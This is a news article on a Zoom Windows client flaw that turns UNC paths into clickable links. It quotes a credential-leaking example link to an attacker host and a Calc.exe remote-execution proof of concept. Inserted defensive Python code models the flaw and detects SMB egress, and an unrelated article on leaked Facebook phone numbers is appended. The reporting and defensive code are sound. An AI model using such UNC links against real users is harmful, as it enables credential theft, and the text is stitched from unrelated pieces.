Windows flaw lets Zoom leak network credentials, runs code remotely – Security – iTnews

Popular video conferencing service Zoom has a high-risk security issue in its Windows client that can be used for limited remote code execution and, worse, to capture Windows NTLM credential hashes and replay them to access network resources, security researchers have found.

Matthew Hickey of Hacker House, a cybersecurity firm that specialises in penetration testing and vulnerability analysis, told iTnews that the Zoom Windows desktop client is vulnerable to a high-risk Universal Naming Convention (UNC) injection flaw in how the app converts Uniform Resource Identifier (URI) paths into clickable links.

“An attacker can inject a link such as \\attacker.computer.com\company_salary.xlsx into the chat; should anyone click on the link it will expose their Windows username, domain name (or computer name) and a hashed version of their Windows password,” Hickey said.

“An attacker can replay those hashed password values and access services such as Microsoft Exchange, Outlook Webmail and SharePoint,” he added.

Hickey tested a discovery by another researcher, who goes by the moniker _g0dmode and who noted that it was possible to capture Windows NT LAN Manager (NTLM) authentication hashes using the flaw.

Expanding on the prior discovery, Hickey told iTnews that it is also possible to run commands and install malware on affected clients.

If an attacker tries to do that, newer versions of Windows display a security warning before launching an executable from a remote location, so the user is alerted that something is amiss.

For example, it is possible to trigger the classic proof-of-concept of launching the built-in Windows calculator by sending a link like: \\127.0.0.1\C$\Windows\System32\Calc.exe

Those alert dialogs are only displayed for executable files and commands, however.

“If an attacker attempts to leak credentials, no such warning is displayed,” Hickey said.

Hickey demonstrated the credentials capture to iTnews.

The flaw affects Zoom’s Windows client only, Hickey said. On Apple’s macOS, the Zoom client doesn’t make the links clickable.
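The link handling described above, as an added example that is not Zoom's code and not from the researchers: a small Python model of a chat linkifier that, like the reported Windows-client behaviour, turns UNC paths into clickable links, beside an allow-list version that only linkifies http(s) URLs (the behaviour the article reports for the macOS client), plus a helper that extracts the SMB host a click would authenticate to. The chat messages are constructed, and the regexes, class and function names are my own.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed chat messages (not captured from Zoom). The first mirrors the
# credential-leak link quoted in the article, the second the Calc.exe demo.
SAMPLE_MESSAGES = [
    r"Q1 numbers are here: \\attacker.computer.com\company_salary.xlsx",
    r"try \\127.0.0.1\C$\Windows\System32\Calc.exe or https://intranet.example/report",
    "nothing clickable here",
]

# \\host\share[\path...]: host, share and path segments end at whitespace.
UNC_RE = re.compile(r"\\\\([A-Za-z0-9._-]+)\\([^\s\\]+)((?:\\[^\s\\]+)*)")
HTTP_RE = re.compile(r"https?://\S+")


@dataclass(frozen=True)
class Link:
    text: str     # what the user sees in the chat window
    target: str   # what the client opens on click
    scheme: str   # "http", "https" or "unc"


def find_unc_paths(text: str) -> List[str]:
    """Every UNC path in a message. When a Windows user clicks one, the OS opens
    an SMB session to the host and answers its NTLM challenge with the user's
    credentials, which is the leak the article describes."""
    return [m.group(0) for m in UNC_RE.finditer(text)]


def smb_target(unc: str) -> str:
    """Host that receives the NTLM handshake if the link is clicked."""
    m = UNC_RE.fullmatch(unc)
    if m is None:
        raise ValueError(f"not a UNC path: {unc!r}")
    return m.group(1)


def linkify_vulnerable(text: str) -> List[Link]:
    """Model of the reported Windows-client behaviour: http(s) URLs and UNC
    paths alike become clickable."""
    links = [Link(m.group(0), m.group(0), m.group(0).split(":", 1)[0])
             for m in HTTP_RE.finditer(text)]
    links += [Link(m.group(0), m.group(0), "unc") for m in UNC_RE.finditer(text)]
    return links


def linkify_hardened(text: str) -> List[Link]:
    """Allow-list fix: only http(s) URLs are clickable; a UNC path stays plain
    text, so nothing in the chat can start an SMB session."""
    return [Link(m.group(0), m.group(0), m.group(0).split(":", 1)[0])
            for m in HTTP_RE.finditer(text)]


if __name__ == "__main__":
    for msg in SAMPLE_MESSAGES:
        print(repr(msg))
        for unc in find_unc_paths(msg):
            print("  UNC path -> NTLM handshake goes to", smb_target(unc))
        print("  vulnerable:", [link.scheme for link in linkify_vulnerable(msg)])
        print("  hardened:  ", [link.scheme for link in linkify_hardened(msg)])
```

The point of the hardened version is the allow-list: rather than trying to enumerate dangerous schemes (UNC, file:, smb:), it only ever makes http and https targets clickable, so the 127.0.0.1\C$ example above is rendered as inert text.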

Despite the warnings when attackers attempt to run code remotely, Hickey said the flaw should be rated as a serious one.

“I would usually score this as a medium-risk issue; however, in light of the fact that the issue is easily exploited through ‘ZoomBombing’ (guessing meeting IDs through brute force) and more susceptible to exploitation in the working-from-home climate, I would advise that it is a high-risk issue,” he said.

“The issue can be considered to be of increased risk as even though corporate and enterprise networks will typically filter the outgoing ports used to exploit this issue, those working at home will not be subject to the same protection,” Hickey added.

“Most home working users will not be subject to strict outbound network use like they typically are when working from a corporate network.”

Hickey explained that while some internet providers filter the Windows file-sharing (SMB) ports to prevent the spread of malware, that is the exception: most home broadband and internet access permits outbound connections to the ports needed to exploit a UNC-related vulnerability.
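The outbound filtering discussed above is also the detection point: a home worker's Windows client that has clicked a UNC link shows up as an allowed SMB connection from an internal address to an Internet address. The following is an added example (my own code, not from iTnews, Hacker House or Zoom) that flags such flows in egress logs. The log lines are constructed in a generic firewall/NetFlow-style format that I assume here (timestamp, src:port, dst:port, protocol, action); 203.0.113.45 stands in for an attacker's SMB listener.

```python
import ipaddress
from dataclasses import dataclass
from typing import List

# Constructed egress log lines (not from a real device). 192.168.1.0/24 is
# the home LAN; 203.0.113.45 is the (documentation-range) attacker host.
SAMPLE_LOG = """\
2020-04-01T09:12:03Z 192.168.1.23:51234 203.0.113.45:445 tcp allow
2020-04-01T09:12:04Z 192.168.1.23:51235 203.0.113.45:139 tcp allow
2020-04-01T09:12:10Z 192.168.1.23:51240 192.168.1.10:445 tcp allow
2020-04-01T09:13:01Z 192.168.1.40:51300 198.51.100.7:443 tcp allow
2020-04-01T09:13:07Z 192.168.1.51:51400 203.0.113.45:445 tcp deny
"""

SMB_PORTS = {445, 139}   # direct SMB and the NetBIOS session service

# Destinations that are legitimately reachable over SMB from inside the LAN.
# Listed explicitly rather than via ipaddress.is_global, which treats the
# 203.0.113.0/24 documentation range as non-global and would hide the hit.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


@dataclass(frozen=True)
class Flow:
    ts: str
    src: str
    sport: int
    dst: str
    dport: int
    proto: str
    action: str


def parse_line(line: str) -> Flow:
    ts, src, dst, proto, action = line.split()
    sip, sport = src.rsplit(":", 1)
    dip, dport = dst.rsplit(":", 1)
    return Flow(ts, sip, int(sport), dip, int(dport), proto.lower(), action.lower())


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def smb_egress(log_text: str) -> List[Flow]:
    """Allowed TCP flows from an internal host to an SMB port on a non-internal
    address. One such connection is enough to leak the user's NTLM response,
    because the client authenticates as soon as the session is opened."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        f = parse_line(line)
        if (f.proto == "tcp" and f.dport in SMB_PORTS and f.action == "allow"
                and is_internal(f.src) and not is_internal(f.dst)):
            hits.append(f)
    return hits


def suspect_hosts(log_text: str) -> List[str]:
    """Internal hosts whose Windows credentials should be treated as exposed."""
    return sorted({f.src for f in smb_egress(log_text)})


if __name__ == "__main__":
    for f in smb_egress(SAMPLE_LOG):
        print(f"{f.ts} {f.src} -> {f.dst}:{f.dport} (possible NTLM hash leak)")
    print("hosts to rotate credentials for:", suspect_hosts(SAMPLE_LOG))
```

The denied flow from 192.168.1.51 is deliberately excluded: a blocked SYN never reaches the NTLM exchange, which is exactly why the corporate perimeter filtering the article mentions works. On a home machine the equivalent is an outbound Windows Firewall rule blocking TCP 445 and 139 to non-local addresses, and, where the environment allows it, setting the policy "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" to deny so the client never answers an Internet host's NTLM challenge in the first place.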

He has reported the issue to Zoom via Twitter.

As its popularity has climbed with people and students working from home in coronavirus lockdowns, the security of Zoom has come under intense scrutiny.

Other researchers have found that Zoom’s Company Directory feature leaks email addresses and photos, and that the video conferencing app does not use end-to-end encryption to protect calls from interception.

The United States Federal Bureau of Investigation’s Boston office also issued an alert over the rash of ZoomBombing attacks, in which uninvited people hijack video conferences, in some cases exposing themselves and/or posting obscene material.

iTnews has sought comment from Zoom on the vulnerability and will update the story when it arrives.


Phone Numbers Of 267 Million Facebook Users Exposed Online In A Data Breach

Millions of Facebook users have had their data exposed online. This follows a discovery by security researchers of an unsecured database containing the personal details of 267 million Facebook users. The database was reportedly left open for nearly two weeks.

The database was first indexed on 4 December but was only discovered by the researchers on 14 December.

The database contained personal information including full names, phone numbers and Facebook user IDs. Other details, such as payment information, are said not to have been exposed.

The team, security researcher Bob Diachenko working with Comparitech, said they discovered an unsecured Elasticsearch database rich in the personal details of millions of Facebook users. Most of the affected users reside in the US, and users who have not set their profiles to private are said to be the most affected.

The team notified the database's host, which has since taken it offline. According to Diachenko, the data had already been shared on a hacker forum two days after it first appeared online on 12 December.

It is not yet known how the data was obtained. The first theory is that it was pulled from Facebook's developer API; if so, this would have happened before the company restricted developer access to personal data such as phone numbers in 2018.

The data could also have been obtained by scraping, or through a flaw in the Facebook API that still lets developers access this type of user data.

“A database this big is likely to be used for phishing and spam, particularly via SMS,” Diachenko said. “Facebook users should be on the lookout for suspicious text messages. Even if the sender knows your name or some basic information about you, be skeptical of any unsolicited messages.”

The researchers recommend that users set their profiles to private, which reduces the chance of their data being scraped.

Facebook has not commented on the matter to date. This is not the first such incident: in September, an open server holding hundreds of millions of phone numbers belonging to Facebook users was discovered.
